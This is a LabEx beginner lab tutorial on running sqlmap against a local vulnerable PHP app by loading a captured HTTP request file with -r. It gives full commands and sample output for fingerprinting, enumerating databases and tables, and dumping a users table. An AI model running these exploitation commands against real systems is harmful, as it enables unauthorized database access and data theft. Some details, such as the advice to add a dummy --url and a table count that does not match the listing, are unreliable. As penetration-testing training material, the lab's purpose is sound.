LabEx
Log InJoin Free

Scan from a Captured HTTP Request File in sqlmap

Kali LinuxBeginner
Practice Now

Introduction

In this lab, you will learn a powerful technique for using sqlmap, a popular open-source penetration testing tool, to detect SQL injection flaws. Instead of directly providing a target URL, you will capture a full HTTP request using a proxy tool like Burp Suite or ZAP, save it to a file, and then instruct sqlmap to use this file for its scanning process. This method is particularly useful when dealing with complex requests (e.g., POST requests with many parameters, custom headers, or authentication tokens) or when you want to replay a specific request without manually reconstructing it. By the end of this lab, you will be proficient in leveraging captured HTTP requests for more precise and flexible SQL injection testing with sqlmap.

Capture a Full HTTP Request with Burp Suite or ZAP

In this step, you will learn how to capture a full HTTP request using a web proxy tool. While Burp Suite and ZAP are common choices, for simplicity and to avoid GUI complexities in this terminal-based lab, we will simulate capturing a request by directly constructing a raw HTTP request for a vulnerable web application.

First, let's ensure our dummy vulnerable web application is accessible. Open a new terminal and use curl to make a request to it.

curl http://localhost/sqli_test/index.php?id=1

You should see output similar to this, confirming the application is running:

id: 1 - Name: Alice<br>

Now, we will manually create a raw HTTP request that sqlmap can use. This request will target the id parameter, which is vulnerable to SQL injection.

nano ~/project/request.txt

Paste the following content into the request.txt file. This represents a simple GET request to our vulnerable application.

GET /sqli_test/index.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Save the file by pressing Ctrl+X, then Y to confirm, and Enter to save to request.txt.

Save the Raw Request to a Text File (e.g., request.txt)

In the previous step, you already created and saved the raw HTTP request into ~/project/request.txt. This file now contains all the necessary information for sqlmap to understand the target and how to interact with it, including the HTTP method (GET), the path (/sqli_test/index.php), the parameters (id=1), and various HTTP headers.

To confirm the content of the file, you can use the cat command:

cat ~/project/request.txt

The output should display the exact HTTP request you pasted:

GET /sqli_test/index.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

This request.txt file is now ready to be used by sqlmap.

Use the -r Flag to Load the Request File

In this step, you will learn about the -r flag in sqlmap. The -r flag tells sqlmap to load the HTTP request from a specified file instead of requiring a URL directly on the command line. This is crucial for scanning complex requests or replaying captured traffic.

The basic syntax for using the -r flag is:

sqlmap -r < request_file > [options]

Where <request_file> is the path to the file containing your raw HTTP request. In our case, this will be ~/project/request.txt.

Before running the full scan, let's try a simple test to ensure sqlmap can parse the file correctly. We'll use the --url option with a dummy URL, just to satisfy sqlmap's requirement for a target, but the actual request will come from the file. This is a common practice when using -r.

sqlmap -r ~/project/request.txt --url="http://localhost/sqli_test/index.php" --fingerprint

The --fingerprint option attempts to identify the backend database management system (DBMS). If sqlmap successfully processes the request file, it will start its fingerprinting process. You might be prompted with questions; for this lab, you can generally accept the default options by pressing Enter or y.

You should see sqlmap starting its process, indicating it's reading from the file. Look for output similar to:

        _
       ___ ___ ___ ___
      |_ -| . | . | . |
      |___|_  |_  |_  |
            |_| |_| |_|   3.7#dev (r18600)

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. sqlmap developers assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting @ 12:34:56 /2023-10-27/

[12:34:56] [INFO] parsing HTTP request from '/home/labex/project/request.txt'
...

This confirms sqlmap is correctly loading the request from request.txt.

Execute the Scan using sqlmap -r request.txt

Now that you understand how to load the request file, it's time to execute a full SQL injection scan using sqlmap with the -r flag. We will use a few common options to make the scan more effective.

The command will be:

sqlmap -r ~/project/request.txt --batch --dbs

Let's break down these options:

  • -r ~/project/request.txt: Loads the HTTP request from the request.txt file.
  • --batch: Runs sqlmap in non-interactive mode, automatically answering "yes" to most prompts. This is useful for scripting or when you know what to expect.
  • --dbs: Enumerates database management systems (DBMS) databases. This is a common first step to discover available databases.

Execute the command:

sqlmap -r ~/project/request.txt --batch --dbs

sqlmap will now begin its scanning process. It will test various SQL injection techniques against the id parameter in the request. Since our dummy application is vulnerable, sqlmap should eventually identify the vulnerability and list the available databases.

You will see a lot of output as sqlmap performs its tests. Look for lines indicating the detection of a vulnerability and the enumeration of databases.

Example output snippet:

...
[12:35:00] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.0' injectable (UNION query (NULL))
...
available databases [2]:
[*] information_schema
[*] testdb
...

This output confirms that sqlmap successfully identified the id parameter as vulnerable and found the testdb database, which we created in the setup.

Verify the Scan Targets the Correct Parameters from the File

In this final step, we will confirm that sqlmap correctly identified and targeted the id parameter from our request.txt file. This is crucial to ensure that your captured request is being interpreted as intended.

When sqlmap starts, it typically identifies the injectable parameters. You can observe this in the output of the previous step. Specifically, look for lines that mention "GET parameter 'id' appears to be... injectable".

To further verify, let's try to dump data from a table within our testdb database. We'll use the --dump option along with specifying the database and table.

First, let's list the tables in testdb:

sqlmap -r ~/project/request.txt --batch -D testdb --tables

You should see sqlmap identifying the users table:

...
Database: testdb
[2 tables]
+-------+
| users |
+-------+
...

Now, let's dump the data from the users table:

sqlmap -r ~/project/request.txt --batch -D testdb -T users --dump

This command instructs sqlmap to dump all entries from the users table within the testdb database, using the request loaded from request.txt.

You should see the data from the users table, confirming that sqlmap successfully exploited the vulnerability through the id parameter specified in your captured request:

...
Database: testdb
Table: users
[3 entries]
+----+---------+
| id | name    |
+----+---------+
| 1  | Alice   |
| 2  | Bob     |
| 3  | Charlie |
+----+---------+
...

This confirms that sqlmap correctly parsed the request.txt file, identified the id parameter, and successfully exploited the SQL injection vulnerability to extract data.

Summary

In this lab, you have successfully learned how to leverage sqlmap's powerful -r flag to scan for SQL injection vulnerabilities using a captured HTTP request file. You started by understanding the concept of capturing raw HTTP requests, then manually created a request.txt file representing a GET request to a vulnerable application. You then used sqlmap -r request.txt to initiate scans, first to fingerprint the database, and then to enumerate databases and dump data from a specific table. This method provides immense flexibility, allowing you to test complex scenarios, replay specific traffic, and integrate sqlmap more seamlessly into your web application penetration testing workflow. Mastering this technique is a valuable skill for any security professional or enthusiast.

Related Kali Linux Courses
Kali Linux for Beginners

Kali Linux for Beginners

cybersecuritykalilinux
Kali Server Exploitation in Action

Kali Server Exploitation in Action

cybersecuritykalilinux